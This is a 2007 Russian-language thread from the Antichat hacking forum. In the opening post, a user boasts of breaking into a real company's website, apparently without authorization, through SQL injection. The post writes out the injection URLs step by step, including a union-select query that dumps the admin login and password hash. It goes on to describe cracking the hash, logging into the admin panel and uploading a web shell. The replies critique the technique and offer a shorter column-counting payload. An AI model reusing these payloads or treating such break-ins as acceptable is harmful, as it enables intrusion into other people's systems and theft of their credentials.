Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
26.12.2007, 15:16
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842
Репутация:
251
|
|
Новогодний взлом!
Короче дело было на днях. Пришел с работы и полез в сеть. Искал юизби винт (подарок другу). И попал на сайт одной известной конторы в моем любимом городе.
Название не буду называть дабы не вызывать интереса юного скрипт-кидиса. Можно добавить, что фирма, где я работаю постоянно обращ. к ним за комплект..
Кликнул на Продукция и попал в меню выбора продукции, но тут мое внимание удалилось в строку браузера.
Код:
http://comp.com/x.php?ProdID=916
Ну и типично я решил проверить на скуль. Поставил заветную кавычку и получил скуль, правда без каких либо ошибок.
Далее
Код:
http://comp.com/x.php?ProdID=916+order+by+1,2,3,4,5/*
Затем возник проблемс , который был решен
Код:
http://comp.com/x.php?ProdID=-916+union+select+1,2,3,4,5/*
Ничего что надо не вывело, ну сразу нашел выход
Код:
http://comp.com/x.php?ProdID=916+and+1=0+union+select+1,2,3,4,5,6/*
Версия мускула была 4 . Осталось подобрать таблиц и вывести заветный пасс админа, т.к . админка уже была найдена.
Хочу добавить, что данный скрипт был написан очень якобы крутой и дорогой конторой за неплохие деньги как потом выяснилось!!!!))))))))))))))
Но при подборе вышел небольшой обломс. Я решил забить, решил стукнуть за помощью на ачат, но прошелся лесов, кста привет и спасибо Termin@L за поддержку.
Сутки прошли, но результатов 0% даже после прогона по словарю предпол. таблиц.
Дальше самое интересно!! Решил зайти в админку, ввел типично admin:admin прошелся в тундру, но решил проверить html код страницы :
Код:
<td class=TableRow1 align=right><input type="text" class=txt name="AdminName" value=""></td>
</tr>
<tr>
<td class=TableRow1>Пароль:</td>
<td class=TableRow1 align=right><input type="password" class=txt name="AdminPWD"></td>
</tr>
<tr>
<td class=TableRow1 colspan="2" align=right><hr size=1><input type="submit" class=but value="Войти"></td>
И что остается только хлопать ушами от радости
AdminPWD--- таблица с паролем админа, ну и аналогично AdminName-- его логин.
Запрос выглядел след. образом:
Код:
http://comp.com/x.php?ProdID=916+and+1=0+union+select+1,name,3,password,5,6+from+AdminPWD+limit+0,1/*
ПОлучил des пароль. После подбора успешно залогонился в админку , были траблы с заливом шелла , но затем вопрос был решен.
Поздравляю все С НОВЫМ ГОДОМ. Мемберы ачата здоровья вам , меньше мазалей на заднице и успешных тем!!!!! |
|
|
26.12.2007, 15:33
|
|
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343
Репутация:
141
|
|
А что прости, тут необычного?
|
|
|
|
26.12.2007, 15:37
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842
Репутация:
251
|
|
Не обычное не стал описывать ибо уже УКА!!!!_)
|
|
|
|
27.12.2007, 16:18
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Типичная sql инъекция, для этого сущствует специальная тема. А вот что касается этого, то это меня вообще убило, делаем то сами не зная что:
Сообщение от fly
Код:
http://comp.com/x.php?ProdID=916+order+by+1,2,3,4,5/*
"Замечательно."
Последний раз редактировалось Grey; 27.12.2007 в 16:29..
|
|
|
|
27.12.2007, 16:22
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842
Репутация:
251
|
|
и чем это тебя убило?
|
|
|
|
27.12.2007, 16:30
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
fly, а ты вобще понимаешь назначение такой вот конструкции, проще http://comp.com/x.php?ProdID=916+order+by+5/*
и вобще я всегда говорил, что получать кол-во столбцов лучше с реально существующим параметром, т.е. не -916, а 916
Название не буду называть дабы не вызывать интереса юного скрипт-кидиса
улыбнуло
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 27.12.2007 в 16:35..
|
|
|
|
27.12.2007, 16:36
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842
Репутация:
251
|
|
Умняги хватит флейм разводить.)))
|
|
|
|
27.12.2007, 16:39
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842
Репутация:
251
|
|
Код:
Типичная sql инъекция, для этого сущствует специальная тема. А вот что касается этого, то это меня вообще убило, делаем то сами не зная что:
Типично опеч.
Код:
http://comp.com/x.php?ProdID=916+order+by+5/*
|
|
|
|
27.12.2007, 16:41
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
1) Что меня убило, ну к примеру то что ты до сих пор не понимаешь конструкцию order by зачем делать сортировку сначала по первому потом по второму потом по третьему и т.д. столбцу? какой смысл?
Если бы ты юзал нормально order+by+n - отсортировать по n-ому столбцу то хоть времени бы меньше затратил. Но чувствуется раз ты не понимаешь этого, то не разбираешся в синтаксисе sql и следовательно вся твоя работа тупая подстановка "чего то там" в параметры на подобие id и т.д печально.
2) Что в этой теме такого что она должна быть отдельной?
Последний раз редактировалось Grey; 27.12.2007 в 18:00..
|
|
|
|
27.12.2007, 16:42
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
флай не тупи,тебе же сказали в чем ты ошибся
|
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Новогодний конкурс
|
Че Гевара |
Болталка |
100 |
11.12.2009 20:41 |
|
Взлом LiTO.ru
|
ZaCo |
Авторские статьи |
5 |
16.10.2005 23:29 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
